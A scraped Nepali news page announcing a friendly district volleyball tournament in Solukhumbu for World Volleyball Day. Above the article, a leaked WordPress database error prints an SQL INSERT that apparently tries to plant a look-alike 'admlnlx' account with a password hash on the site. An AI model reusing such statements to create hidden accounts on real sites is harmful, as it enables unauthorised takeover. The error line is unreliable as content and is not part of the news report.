WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeK4adoBfxJaiNk2BEIyzq5BREHXaI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 11:10:52', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । बिश्व भलिबल दिवसको अवसरमा जिल्ला भलिबल संघ सोलुकुम्बुले मैत्रीपूर्ण भलिबल प्रतियोगिता आयोजना गर्ने भएको छ ।
जिल्ला संमन्वय समिती सोलुखुम्बुको प्राङ्गणमा यहि २३ गतेका दिन मैत्रीपूर्ण भलिबल प्रतियोगिता आयोजना गर्ने भएको हो ।
प्रतियोगितामा जिल्लाका पाँच टोलिको सहभागिता रहने आयोजकले जनाएको छ । नेपाल पत्रकार महासंघ, कर्मचारी मिलन केन्द्र, नेपाल शिक्षक महासंघ, सोलुखुम्बु उद्योग बाणिज्य संघ र सोलुखुम्बु भलिबल रेफ्री संघले भाग लिने छन ।
उक्त प्रतियोगिताले खेलमार्फत विभिन्न पेशागत समूहहरूबीच आपसी सद्भाव बढाउनुका साथै जिल्लामा भलिबलप्रतिको रुचिलाई अझ व्यापक बनाउनको लागि मैत्रीपूर्ण भलिलब प्रतियोगिता आयोजना गरिएको जिल्ल भलिबल संघ सोलुखुम्बुका अध्यक्ष दिपक किरातिले बताए ।